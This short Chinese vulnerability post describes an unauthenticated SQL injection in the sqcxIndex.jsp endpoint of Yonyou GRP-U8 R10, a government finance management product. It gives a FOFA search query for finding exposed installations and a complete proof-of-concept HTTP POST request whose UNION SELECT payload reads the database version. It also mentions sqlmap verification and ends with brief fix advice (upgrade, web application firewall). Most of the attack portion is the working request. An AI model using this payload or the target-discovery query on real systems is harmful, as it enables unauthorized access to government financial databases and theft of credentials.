产品简介
用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。
漏洞描述
用友GRP-U8 sqcxIndex.jsp接口存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
资产测测
FOFA:app=“用友-GRP-U8”
漏洞复现
POST /u8qx/sqcxIndex.jsp HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
11=11&key=2%25')+union+select+@@version,2--+
Sqlmap验证
修复建议
1.升级至安全版本。
2.部署Web应用防火墙,对数据库操作进行监控。
